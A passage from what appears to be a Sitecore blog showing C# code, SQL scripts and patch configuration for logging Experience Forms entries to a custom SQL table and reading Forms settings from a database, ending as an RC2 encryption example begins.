CanGenerateLogMessage(LogEntry entry) { return entry != null && !string.IsNullOrWhiteSpace(entry.Message) && entry.Owner != null; } protected virtual string GenerateExceptionMessage(Exception exception) { if(exception == null) { return string.Empty; } StringBuilder messageBuilder = new StringBuilder(); messageBuilder.Append(_logEntryServiceSettings.ExceptionPrefix).Append(exception.GetType().FullName); ; AppendNewLine(messageBuilder); messageBuilder.Append(_logEntryServiceSettings.MessagePrefix).Append(exception.Message); AppendNewLine(messageBuilder); if (!string.IsNullOrWhiteSpace(exception.Source)) { messageBuilder.Append(_logEntryServiceSettings.SourcePrefix).Append(exception.Source); AppendNewLine(messageBuilder); } if(!string.IsNullOrWhiteSpace(exception.StackTrace)) { messageBuilder.Append(exception.StackTrace); AppendNewLine(messageBuilder); } if (exception.InnerException != null) { AppendNewLine(messageBuilder); messageBuilder.Append(_logEntryServiceSettings.NestedExceptionPrefix); AppendNewLine(messageBuilder, 3); messageBuilder.Append(GenerateExceptionMessage(exception.InnerException)); AppendNewLine(messageBuilder); } return messageBuilder.ToString(); } protected virtual void AppendNewLine(StringBuilder builder, int repeatCount = 1) { AppendRepeat(builder, _newLine, repeatCount); } protected virtual void AppendRepeat(StringBuilder builder, string stringToAppend, int repeatCount) { if (builder == null || string.IsNullOrWhiteSpace(stringToAppend) || repeatCount < 1) { return; } for(int i = 0; i < repeatCount; i++) { builder.Append(stringToAppend); } } } } I’m not going to discuss all the code in the above class as it should be self-explanatory. I do want to point out GenerateLogMessage() will generate one of two strings, depending on whether an Exception was set on the LogEntry instance. If an Exception was set, we append the Exception details — the GenerateExceptionMessage() method generates a string from the Exception — onto the end of the LogEntry message If it was not set, we just return the LogEntry message to the caller. Well, now we need a place to store the log entries. I used the following SQL script to create a new table for storing these: USE [ExperienceFormsSettings] GO CREATE TABLE [dbo].[ExperienceFormsLog]( [ID] [uniqueidentifier] NOT NULL, [LogEntryType] [nvarchar](max) NOT NULL, [LogMessage] [nvarchar](max) NOT NULL, [Created] [datetime] NOT NULL, CONSTRAINT [PK_ExperienceFormsLog] PRIMARY KEY CLUSTERED ( [ID] ASC )WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO ALTER TABLE [dbo].[ExperienceFormsLog] ADD DEFAULT (newsequentialid()) FOR [ID] GO I also sprinkled some magical database dust onto the table: 😉 Wonderful, we now can move on to the fun bit — actually writing some code to store these entries into the database table created from the SQL script above. I wrote the following POCO class to represent a SQL command — either a query or statement (it really doesn’t matter as it will support both): namespace Sandbox.Foundation.Forms.Models.Logging { public class SqlCommand { public string Sql { get; set; } public object[] Parameters { get; set; } } } I’m sure I could have found something in Sitecore.Kernel.dll that does exactly what the class above does but I couldn’t find such a thing (if you know of such a class, please share in a comment below). Now we need a settings class for the SQL Logger I am writing further down in this post. As I had done for the LogEntryService class above, this data will be coming from Sitecore configuration: namespace Sandbox.Foundation.Forms.Models.Logging { public class SqlLoggerSettings { public string LogPrefix { get; set; } public string LogDatabaseConnectionStringName { get; set; } public string InsertLogEntrySqlFormat { get; set; } public string ConnectionStringNameColumnName { get; set; } public string FieldsPrefixColumnName { get; set; } public string FieldsIndexNameColumnName { get; set; } public int NotFoundOrdinal { get; set; } public string LogEntryTypeParameterName { get; set; } public string LogMessageParameterName { get; set; } public string CreatedParameterName { get; set; } } } Now the fun part — creating an implementation of Sitecore.ExperienceForms.Diagnostics.ILogger: using System; using Sitecore.Abstractions; using Sitecore.Data.DataProviders.Sql; using Sitecore.ExperienceForms.Diagnostics; using Sandbox.Foundation.Forms.Services.Factories; using Sandbox.Foundation.Forms.Models.Logging; using Sandbox.Foundation.Forms.Services.Factories.Diagnostics; namespace Sandbox.Foundation.Forms.Services.Diagnostics { public class SqlLogger : ILogger { private readonly SqlLoggerSettings _sqlLoggerSettings; private readonly BaseSettings _settings; private readonly BaseFactory _factory; private readonly SqlDataApi _sqlDataApi; private readonly ILogEntryFactory _logEntryFactory; private readonly ILogEntryService _logEntryService; private readonly IRepositoryLogEntryFactory _repositoryLogEntryFactory; public SqlLogger(SqlLoggerSettings sqlLoggerSettings, BaseSettings settings, BaseFactory factory, ISqlDataApiFactory sqlDataApiFactory, ILogEntryFactory logEntryFactory, IRepositoryLogEntryFactory repositoryLogEntryFactory, ILogEntryService logEntryService) { _sqlLoggerSettings = sqlLoggerSettings; _settings = settings; _factory = factory; _sqlDataApi = CreateSqlDataApi(sqlDataApiFactory); _logEntryFactory = logEntryFactory; _logEntryService = logEntryService; _repositoryLogEntryFactory = repositoryLogEntryFactory; } protected virtual SqlDataApi CreateSqlDataApi(ISqlDataApiFactory sqlDataApiFactory) { return sqlDataApiFactory.CreateSqlDataApi(GetLogDatabaseConnectionString()); } protected virtual string GetLogDatabaseConnectionString() { return _settings.GetConnectionString(GetLogDatabaseConnectionStringName()); } protected virtual string GetLogDatabaseConnectionStringName() { return _sqlLoggerSettings.LogDatabaseConnectionStringName; } public void Debug(string message) { Debug(message, GetDefaultOwner()); } public void Debug(string message, object owner) { SaveLogEntry(CreateLogEntry(GetDebugLogEntryType(), message, owner, GetLogEntryDateTime())); } protected virtual string GetDebugLogEntryType() { return _logEntryService.GetDebugLogEntryType(); } public void LogError(string message) { LogError(message, null, GetDefaultOwner()); } public void LogError(string message, object owner) { LogError(message, null, owner); } public void LogError(string message, Exception exception, Type ownerType) { LogError(message, exception, (object)ownerType); } public void LogError(string message, Exception exception, object owner) { SaveLogEntry(CreateLogEntry(GetErrorLogEntryType(), message, exception, owner, GetLogEntryDateTime())); } protected virtual string GetErrorLogEntryType() { return _logEntryService.GetErrorLogEntryType(); } public void Fatal(string message) { Fatal(message, null, GetDefaultOwner()); } public void Fatal(string message, object owner) { Fatal(message, null, owner); } public void Fatal(string message, Exception exception, Type ownerType) { Fatal(message, exception, (object)ownerType); } public void Fatal(string message, Exception exception, object owner) { SaveLogEntry(CreateLogEntry(GetFatalLogEntryType(), message, exception, owner, GetLogEntryDateTime())); } protected virtual string GetFatalLogEntryType() { return _logEntryService.GetFatalLogEntryType(); } public void Info(string message) { Info(message, GetDefaultOwner()); } public void Info(string message, object owner) { SaveLogEntry(CreateLogEntry(GetInfoLogEntryType(), message, owner, GetLogEntryDateTime())); } protected virtual string GetInfoLogEntryType() { return _logEntryService.GetInfoLogEntryType(); } public void Warn(string message) { Warn(message, GetDefaultOwner()); } public void Warn(string message, object owner) { SaveLogEntry(CreateLogEntry(GetWarnLogEntryType(), message, owner, GetLogEntryDateTime())); } protected virtual string AddPrefixToMessage(string message) { return string.Concat(_sqlLoggerSettings.LogPrefix, message); } protected virtual object GetDefaultOwner() { return this; } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, Type ownerType, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, exception, ownerType, createdDate); } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, object owner, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, exception, owner, createdDate); } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, Type ownerType, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, ownerType, createdDate); } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, owner, createdDate); } protected virtual string GetWarnLogEntryType() { return _logEntryService.GetWarnLogEntryType(); } protected virtual DateTime GetLogEntryDateTime() { return DateTime.Now.ToUniversalTime(); } protected virtual void SaveLogEntry(LogEntry entry) { if (entry == null) { return; } entry.LogMessage = _logEntryService.GenerateLogMessage(entry); RepositoryLogEntry repositoryEntry = CreateRepositoryLogEntry(entry); if (repositoryEntry == null) { return; } SaveRepositoryLogEntry(repositoryEntry); } protected virtual string GenerateLogMessage(LogEntry entry) { return _logEntryService.GenerateLogMessage(entry); } protected virtual RepositoryLogEntry CreateRepositoryLogEntry(LogEntry entry) { return _repositoryLogEntryFactory.CreateRepositoryLogEntry(entry); } protected virtual void SaveRepositoryLogEntry(RepositoryLogEntry entry) { if(!CanLogEntry(entry)) { return; } SqlCommand insertCommand = GetinsertCommand(entry); if(insertCommand == null) { return; } ExecuteNoResult(insertCommand); } protected virtual bool CanLogEntry(RepositoryLogEntry entry) { return entry != null && !string.IsNullOrWhiteSpace(entry.LogEntryType) && !string.IsNullOrWhiteSpace(entry.LogMessage) && entry.Created > DateTime.MinValue && entry.Created < DateTime.MaxValue; } protected virtual SqlCommand GetinsertCommand(RepositoryLogEntry entry) { return new SqlCommand { Sql = GetInsertLogEntrySql(), Parameters = GetinsertCommandParameters(entry) }; } protected virtual object[] GetinsertCommandParameters(RepositoryLogEntry entry) { return new object[] { GetLogEntryTypeParameterName(), entry.LogEntryType, GetLogMessageParameterName(), entry.LogMessage, GetCreatedParameterName(), entry.Created }; } protected virtual string GetLogEntryTypeParameterName() { return _sqlLoggerSettings.LogEntryTypeParameterName; } protected virtual string GetLogMessageParameterName() { return _sqlLoggerSettings.LogMessageParameterName; } protected virtual string GetCreatedParameterName() { return _sqlLoggerSettings.CreatedParameterName; } protected virtual string GetInsertLogEntrySql() { return _sqlLoggerSettings.InsertLogEntrySqlFormat; } protected virtual void ExecuteNoResult(SqlCommand sqlCommand) { _factory.GetRetryer().ExecuteNoResult(() => { _sqlDataApi.Execute(sqlCommand.Sql, sqlCommand.Parameters); }); } } } Since there is a lot of code in the class above, I’m not going to talk about all of it — it should be clear on what this class is doing for the most part. I do want to highlight that the SaveRepositoryLogEntry() method takes in a RepositoryLogEntry instance; builds up a SqlCommand instance from it as well as the insert SQL statement and parameters from the SqlLoggerSettings instance (these are coming from Sitecore configuration, and there are hooks on this class to allow for overriding these if needed); and passes the SqlCommand instance to the ExecuteNoResult() method which uses the SqlDataApi instance for saving to the database. Plus, I’m leveraging an “out of the box” “retryer” from the Sitecore.Kernel.dll to ensure it makes its way into the database table. Moreover, I’m reusing the ISqlDataApiFactory instance above from my previous post. Have a read of it so you can see what this factory class does. Since Experience Forms was built perfectly — 😉 — I couldn’t see any LogEntry instances being saved to my database right away. So went ahead and created some <forms.renderField> pipeline processors to capture some. The following interface is for a <forms.renderField> pipeline processor to just throw an exception by dividing by zero: using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public interface IThrowExceptionProcessor { void Process(RenderFieldEventArgs args); } } Here is its implementation class: using System; using Sitecore.ExperienceForms.Diagnostics; using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public class ThrowExceptionProcessor : IThrowExceptionProcessor { private readonly ILogger _logger; public ThrowExceptionProcessor(ILogger logger) { _logger = logger; } public void Process(RenderFieldEventArgs args) { try { int i = 1 / GetZero(); } catch(Exception ex) { _logger.LogError(ToString(), ex, this); } } private int GetZero() { return 0; } } } I’m sure you would never do such a thing, right? 😉 I then created the following interface for another <forms.renderField> pipeline processor to log some information on the RenderFieldEventArgs instance sent to the Process() method: using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public interface ILogRenderedFieldInfo { void Process(RenderFieldEventArgs args); } } Here is the implementation class for this: using Sitecore.ExperienceForms.Diagnostics; using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; using Sitecore.Mvc.Pipelines; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public class LogRenderedFieldInfo : MvcPipelineProcessor<RenderFieldEventArgs>, ILogRenderedFieldInfo { private readonly ILogger _logger; public LogRenderedFieldInfo(ILogger logger) { _logger = logger; } public override void Process(RenderFieldEventArgs args) { LogInfo($"ViewModel Details:\n\nName: {args.ViewModel.Name}, ItemId: {args.ViewModel.ItemId}, TemplateId: {args.ViewModel.TemplateId}, FieldTypeItemId: {args.ViewModel.FieldTypeItemId}"); LogInfo($"RenderingSettings Details\n\nFieldTypeName: {args.RenderingSettings.FieldTypeName}, FieldTypeId: {args.RenderingSettings.FieldTypeId}, FieldTypeIcon: {args.RenderingSettings.FieldTypeIcon}, FieldTypeDisplayName: {args.RenderingSettings.FieldTypeDisplayName}, FieldTypeBackgroundColor: {args.RenderingSettings.FieldTypeBackgroundColor}"); LogInfo($"Item Details: {args.Item.ID}, Name: {args.Item.Name} FullPath: {args.Item.Paths.FullPath}, TemplateID: {args.Item.TemplateID}"); } protected virtual void LogInfo(string message) { if(string.IsNullOrWhiteSpace(message)) { return; } _logger.Info(message); } } } I then registered everything in the Sitecore IoC container using the following configurator: using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sitecore.ExperienceForms.Diagnostics; using Sandbox.Foundation.Forms.Services.Factories.Diagnostics; using Sandbox.Foundation.Forms.Services.Factories; using Sandbox.Foundation.Forms.Models.Logging; using Sandbox.Foundation.Forms.Services.Environment; using Sandbox.Foundation.Forms.Services.Diagnostics; using Sandbox.Foundation.Forms.Pipelines.RenderField; namespace Sandbox.Foundation.Forms { public class SqlLoggerConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { ConfigureConfigObjects(serviceCollection); ConfigureFactories(serviceCollection); ConfigureServices(serviceCollection); ConfigurePipelineProcessors(serviceCollection); } private void ConfigureConfigObjects(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(provider => GetLogEntryServiceSettings(provider)); serviceCollection.AddSingleton(provider => GetSqlLoggerSettings(provider)); } private LogEntryServiceSettings GetLogEntryServiceSettings(IServiceProvider provider) { return CreateConfigObject<LogEntryServiceSettings>(provider, "moduleSettings/foundation/forms/logEntryServiceSettings"); } private SqlLoggerSettings GetSqlLoggerSettings(IServiceProvider provider) { return CreateConfigObject<SqlLoggerSettings>(provider, "moduleSettings/foundation/forms/sqlLoggerSettings"); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } private void ConfigureFactories(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ILogEntryFactory, LogEntryFactory>(); serviceCollection.AddSingleton<IRepositoryLogEntryFactory, RepositoryLogEntryFactory>(); serviceCollection.AddSingleton<ISqlDataApiFactory, SqlDataApiFactory>(); } private void ConfigureServices(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IEnvironmentService, EnvironmentService>(); serviceCollection.AddSingleton<ILogEntryService, LogEntryService>(); serviceCollection.AddSingleton<ILogger, SqlLogger>(); } private void ConfigurePipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ILogRenderedFieldInfo, LogRenderedFieldInfo>(); serviceCollection.AddSingleton<IThrowExceptionProcessor, ThrowExceptionProcessor>(); } } } Note: the GetLogEntryServiceSettings() and the GetSqlLoggerSettings() methods both create settings objects by using the Sitecore Configuration Factory. Ultimately, these settings objects are thrown into the container so they can be injected into the service classes that need them. I then strung everything together using the following the Sitecore patch configuration file. <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <pipelines> <forms.renderField> <processor type="Sandbox.Foundation.Forms.Pipelines.RenderField.LogRenderedFieldInfo, Sandbox.Foundation.Forms" resolve="true"/> <processor type="Sandbox.Foundation.Forms.Pipelines.RenderField.ThrowExceptionProcessor, Sandbox.Foundation.Forms" resolve="true"/> </forms.renderField> </pipelines> <services> <configurator type="Sandbox.Foundation.Forms.SqlLoggerConfigurator, Sandbox.Foundation.Forms" /> <register serviceType="Sitecore.ExperienceForms.Diagnostics.ILogger, Sitecore.ExperienceForms"> <patch:delete /> </register> </services> <moduleSettings> <foundation> <forms> <logEntryServiceSettings type="Sandbox.Foundation.Forms.Models.Logging.LogEntryServiceSettings, Sandbox.Foundation.Forms" singleInstance="true"> <DebugLogEntryType>DEBUG</DebugLogEntryType> <ErrorLogEntryType>ERROR</ErrorLogEntryType> <FatalLogEntryType>FATAL</FatalLogEntryType> <InfoLogEntryType>INFO</InfoLogEntryType> <WarnLogEntryType>WARN</WarnLogEntryType> <ExceptionPrefix>Exception: </ExceptionPrefix> <MessagePrefix>Message: </MessagePrefix> <SourcePrefix>Source: </SourcePrefix> <NestedExceptionPrefix>Nested Exception</NestedExceptionPrefix> <LogEntryTimeFormat>HH:mm:ss.ff</LogEntryTimeFormat> </logEntryServiceSettings> <sqlLoggerSettings type="Sandbox.Foundation.Forms.Models.Logging.SqlLoggerSettings, Sandbox.Foundation.Forms" singleInstance="true"> <LogPrefix>[Experience Forms]:</LogPrefix> <LogDatabaseConnectionStringName>ExperienceFormsSettings</LogDatabaseConnectionStringName> <InsertLogEntrySqlFormat>INSERT INTO {0}ExperienceFormsLog{1}({0}LogEntryType{1},{0}LogMessage{1},{0}Created{1})VALUES({2}logEntryType{3},{2}logMessage{3},{2}created{3});</InsertLogEntrySqlFormat> <LogEntryTypeParameterName>logEntryType</LogEntryTypeParameterName> <LogMessageParameterName>logMessage</LogMessageParameterName> <CreatedParameterName>created</CreatedParameterName> </sqlLoggerSettings> </forms> </foundation> </moduleSettings> </sitecore> </configuration> Ok, let’s take this for a spin. After building and deploying everything above, I spun up my Sitecore instance: I then navigated to a form I had created in a previous post: After the page with my form was done loading, I ran a query on my custom log table and saw this: As you can see, it worked. If you have any questions or comments, don’t hesitate to drop these in a comment below. Until next time, have yourself a Sitecoretastic day! Grab Sitecore Experience Forms Configuration Settings from a Custom SQL Server Database Table Just the other day, I poking around Sitecore Experience Forms to see what’s customisable and have pretty much concluded virtually everything is. morpheus How? Just have a look at http://[instance]/sitecore/admin/showservicesconfig.aspx of your Sitecore instance and scan for “ExperienceForms”. You will also discover lots of its service class are registered in Sitecore’s IoC container — such makes it easy to swap things out with your own service implementation classes as long as they implement those service types defined in the container. Since I love to tinkering with all things in Sitecore — most especially when it comes to customising bits of it — I decided to have a crack at replacing IFormsConfigurationSettings — more specifically Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings in Sitecore.ExperienceForms.dll which represents Sitecore configuration settings for Experience Forms — as it appeared to be something simple enough to do. The IFormsConfigurationSettings interface represents the following configuration settings: config-settings-ootb So, what did I do to customise it? I wrote a bunch of code — it’s all in this post — which pulls these settings from a custom SQL Server database table. in-da-db.gif Why did I do that? Well, I did it because I could. 😉 Years ago, long before my Sitecore days, I worked on ASP.NET Web Applications which had their configuration settings stored in SQL Server databases. Whether this was, or still is, a good idea is a discussion for another time though you are welcome to drop a comment below with your thoughts. However, for the meantime, just roll with it as the point of this post is to show that you can customise virtually everything in Experience Forms, and I’m just showing one example. I first created the following class which implements IFormsConfigurationSettings: using Sitecore.ExperienceForms.Configuration; namespace Sandbox.Foundation.Forms.Models.Configuration { public class SandboxFormsConfigurationSettings : IFormsConfigurationSettings { public string ConnectionStringName { get; set; } public string FieldsPrefix { get; set; } public string FieldsIndexName { get; set; } } } You might be asking “Mike, why did you create an implementation class when Experience Forms already provides one ‘out of the box’?” Well, all the properties defined in Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings — these are the same properties that you see in the implementation class above — lack mutators on them in the interface. My implementation class of IFormsConfigurationSettings adds them in — I hate baking method calls in property accessors as it doesn’t seem clean to me. ¯\_(ツ)_/¯ When I had a look at the “out of the box” implementation class of IFormsConfigurationSettings, I discovered direct calls to the GetSetting() method on the Sitecore.Configuration.Settings static class — this lives in Sitecore.Kernel.dll — but that doesn’t help me with setting those properties, hence the custom IFormsConfigurationSettings class above. Next, I used the following SQL script to create my custom settings database table: USE [ExperienceFormsSettings] GO CREATE TABLE [dbo].[FormsConfigurationSettings]( [FieldsPrefix] [nvarchar](max) NULL, [FieldsIndexName] [nvarchar](max) NULL, [ConnectionStringName] [nvarchar](max) NULL ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO I then inserted the settings from the configuration file snapshot above into my new table (I’ve omitted the SQL insert statement for this): config-database Now we need a way to retrieve these settings from the database. The following interface will be for factory classes which create instances of Sitecore.Data.DataProviders.Sql.SqlDataApi — this lives in Sitecore.Kernel.dll — with the passed connection strings: using Sitecore.Data.DataProviders.Sql; namespace Sandbox.Foundation.Forms.Services.Factories { public interface ISqlDataApiFactory { SqlDataApi CreateSqlDataApi(string connectionString); } } Well, we can’t do much with an interface without having some class implement it. The following class implements the interface above: using Sitecore.Data.DataProviders.Sql; using Sitecore.Data.SqlServer; namespace Sandbox.Foundation.Forms.Services.Factories { public class SqlDataApiFactory : ISqlDataApiFactory { public SqlDataApi CreateSqlDataApi(string connectionString) { if(string.IsNullOrWhiteSpace(connectionString)) { return null; } return new SqlServerDataApi(connectionString); } } } It’s just creating an instance of the SqlServerDataApi class. Nothing special about it at all. Ironically, I do have to save my own configuration settings in Sitecore Configuration — this would include the the connection string name to the database that contains my new table as well as a few other things. An instance of the following class will contain these settings — have a look at /sitecore/moduleSettings/foundation/forms/repositorySettings in the Sitecore patch file near the bottom of this post but be sure to come back up here when you are finished 😉 — and this instance will be put into the Sitecore IoC container so it can be injected in an instance of a class I’ll talk about further down in this post: namespace Sandbox.Foundation.Forms.Models.Configuration { public class RepositorySettings { public string ConnectionStringName { get; set; } public string GetSettingsSql { get; set; } public string ConnectionStringNameColumnName { get; set; } public string FieldsPrefixColumnName { get; set; } public string FieldsIndexNameColumnName { get; set; } public int NotFoundOrdinal { get; set; } } } I then defined the following interface for repository classes which retrieve IFormsConfigurationSettings instances: using Sitecore.ExperienceForms.Configuration; namespace Sandbox.Foundation.Forms.Repositories.Configuration { public interface ISettingsRepository { IFormsConfigurationSettings GetFormsConfigurationSettings(); } } Here’s the implementation class for the interface above: using System; using System.Data; using System.Linq; using Sitecore.Abstractions; using Sitecore.Data.DataProviders.Sql; using Sitecore.ExperienceForms.Configuration; using Sitecore.ExperienceForms.Diagnostics; using Sandbox.Foundation.Forms.Models.Configuration; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms.Repositories.Configuration { public class SettingsRepository : ISettingsRepository { private readonly RepositorySettings _repositorySettings; private readonly BaseSettings _settings; private readonly int _notFoundOrdinal; private readonly ILogger _logger; private readonly SqlDataApi _sqlDataApi; public SettingsRepository(RepositorySettings repositorySettings, BaseSettings settings, ILogger logger, ISqlDataApiFactory sqlDataApiFactory) { _repositorySettings = repositorySettings; _settings = settings; _notFoundOrdinal = GetNotFoundOrdinal(); _logger = logger; _sqlDataApi = GetSqlDataApi(sqlDataApiFactory); } protected virtual SqlDataApi GetSqlDataApi(ISqlDataApiFactory sqlDataApiFactory) { return sqlDataApiFactory.CreateSqlDataApi(GetConnectionString()); } protected virtual string GetConnectionString() { return _settings.GetConnectionString(GetConnectionStringName()); } protected virtual string GetConnectionStringName() { return _repositorySettings.ConnectionStringName; } public IFormsConfigurationSettings GetFormsConfigurationSettings() { try { return _sqlDataApi.CreateObjectReader(GetSqlQuery(), GetParameters(), GetMaterializer()).FirstOrDefault(); } catch (Exception ex) { LogError(ex); } return CreateFormsConfigurationSettingsNullObject(); } protected virtual string GetSqlQuery() { return _repositorySettings.GetSettingsSql; } protected virtual object[] GetParameters() { return Enumerable.Empty<object>().ToArray(); } protected virtual Func<IDataReader, IFormsConfigurationSettings> GetMaterializer() { return new Func<IDataReader, IFormsConfigurationSettings>(ParseFormsConfigurationSettings); } protected virtual IFormsConfigurationSettings ParseFormsConfigurationSettings(IDataReader dataReader) { return new SandboxFormsConfigurationSettings { ConnectionStringName = GetString(dataReader, GetConnectionStringNameColumnName()), FieldsPrefix = GetString(dataReader, GetFieldsPrefixColumnName()), FieldsIndexName = GetString(dataReader, GetFieldsIndexNameColumnName()) }; } protected virtual string GetString(IDataReader dataReader, string columnName) { if(dataReader == null || string.IsNullOrWhiteSpace(columnName)) { return string.Empty; } int ordinal = GetOrdinal(dataReader, columnName); if(ordinal == _notFoundOrdinal) { return string.Empty; } return dataReader.GetString(ordinal); } protected virtual int GetOrdinal(IDataReader dataReader, string columnName) { if(dataReader == null || string.IsNullOrWhiteSpace(columnName)) { return _notFoundOrdinal; } try { return dataReader.GetOrdinal(columnName); } catch(IndexOutOfRangeException) { return _notFoundOrdinal; } } protected virtual int GetNotFoundOrdinal() { return _repositorySettings.NotFoundOrdinal; } protected virtual void LogError(Exception exception) { _logger.LogError(ToString(), exception, this); } protected virtual string GetConnectionStringNameColumnName() { return _repositorySettings.ConnectionStringNameColumnName; } protected virtual string GetFieldsPrefixColumnName() { return _repositorySettings.FieldsPrefixColumnName; } protected virtual string GetFieldsIndexNameColumnName() { return _repositorySettings.FieldsIndexNameColumnName; } protected virtual IFormsConfigurationSettings CreateFormsConfigurationSettingsNullObject() { return new SandboxFormsConfigurationSettings { ConnectionStringName = string.Empty, FieldsIndexName = string.Empty, FieldsPrefix = string.Empty }; } } } I’m not going to go into details of all the code above but will talk about some important pieces. The GetFormsConfigurationSettings() method above creates an instance of the IFormsConfigurationSettings instance using the SqlDataApi instance created from the injected factory service — this was defined above — with the SQL query provided from configuration along with the GetMaterializer() method which just uses the ParseFormsConfigurationSettings() method to create an instance of the IFormsConfigurationSettings by grabbing data from the IDataReader instance. Phew, I’m out of breath as that was a mouthful. 😉 I then registered all of my service classes above in the Sitecore IoC container using the following the configurator — aka a class that implements the IServicesConfigurator interface: using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sitecore.ExperienceForms.Configuration; using Sandbox.Foundation.Forms.Repositories.Configuration; using Sandbox.Foundation.Forms.Models.Configuration; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms { public class SettingsConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(provider => GetRepositorySettings(provider)); serviceCollection.AddSingleton<ISqlDataApiFactory, SqlDataApiFactory>(); serviceCollection.AddSingleton<ISettingsRepository, SettingsRepository>(); serviceCollection.AddSingleton(provider => GetFormsConfigurationSettings(provider)); } private RepositorySettings GetRepositorySettings(IServiceProvider provider) { return CreateConfigObject<RepositorySettings>(provider, "moduleSettings/foundation/forms/repositorySettings"); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private IFormsConfigurationSettings GetFormsConfigurationSettings(IServiceProvider provider) { ISettingsRepository repository = GetService<ISettingsRepository>(provider); return repository.GetFormsConfigurationSettings(); } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } } } One thing to note is the GetRepositorySettings() method above uses the Configuration Factory — this is represented by the BaseFactory abstract class which lives in the Sitecore IoC container “out of the box” — to create an instance of the RepositorySettings class, defined further up in this post, using the settings in the following Sitecore patch file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <services> <configurator type="Sandbox.Foundation.Forms.SettingsConfigurator, Sandbox.Foundation.Forms" /> <register serviceType="Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings, Sitecore.ExperienceForms"> <patch:delete /> </register> </services> <moduleSettings> <foundation> <forms> <repositorySettings type="Sandbox.Foundation.Forms.Models.Configuration.RepositorySettings, Sandbox.Foundation.Forms" singleInstance="true"> <ConnectionStringName>ExperienceFormsSettings</ConnectionStringName> <GetSettingsSql>SELECT TOP (1) {0}ConnectionStringName{1},{0}FieldsPrefix{1},{0}FieldsIndexName{1} FROM {0}FormsConfigurationSettings{1}</GetSettingsSql> <ConnectionStringNameColumnName>ConnectionStringName</ConnectionStringNameColumnName> <FieldsPrefixColumnName>FieldsPrefix</FieldsPrefixColumnName> <FieldsIndexNameColumnName>FieldsIndexName</FieldsIndexNameColumnName> <NotFoundOrdinal>-1</NotFoundOrdinal> </repositorySettings> </forms> </foundation> </moduleSettings> </sitecore> </configuration> I want to point out that I’m deleting the Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings service from Sitecore’s configuration as I am adding it back in to the Sitecore IoC container with my own via the configurator above. After deploying everything, I waited for my Sitecore instance to reload. jones-testing.gif Once Sitecore was responsive again, I navigated to “Forms” on the Sitecore Launch Pad and made sure everything had still worked as before. It did. Trust me, it did. 😉 living-in-db If you have any questions/comments on any of the above, or would just like to drop a line to say “hello”, then please share in a comment below. Otherwise, until next time, keep on Sitecoring. Encrypt Sitecore Experience Forms Data in Powerful Ways Last week, I was honoured to co-present Sitecore Experience Forms alongside my dear friend — and fellow trollster 😉 — Sitecore MVP Kamruz Jaman at SUGCON EU 2018. We had a blast showing the ins and outs of Experience Forms, and of course trolled a bit whilst on the main stage. During our talk, Kamruz had mentioned the possibility of replacing the “Out of the Box” (OOTB) Sitecore.ExperienceForms.Data.IFormDataProvider — this lives in Sitecore.ExperienceForms.dll — whose class implementations serve as Repository objects for storing or retrieving from some datastore (in Experience Forms this is MS SQL Server OOTB) with another to encrypt/decrypt data when saving to or retrieving from the datastore. Well, I had done something exactly like this for Web Forms for Marketers (WFFM) about five years ago — be sure to have a read my blog post on this before proceeding as it gives context to the rest of this blog post — so thought it would be appropriate for me to have a swing at doing this for Experience Forms. I first created an interface for classes that will encrypt/decrypt strings — this is virtually the same interface I had used in my older post on encrypting data in WFFM: namespace Sandbox.Foundation.Forms.Services.Encryption { public interface IEncryptor { string Encrypt(string key, string input); string Decrypt(string key, string input); } } I then created a class to encrypt/decrypt strings using the RC2 encryption algorithm — I had also poached this from my older post on encrypting data in WFFM (please note, this encryption algorithm is not the most robust so do not use this in any production environment. Please be sure to use something more robust): using System.Text; using System.Security.Cryptography; namespace Sandbox.Foundation.Forms.Services.Encryption { 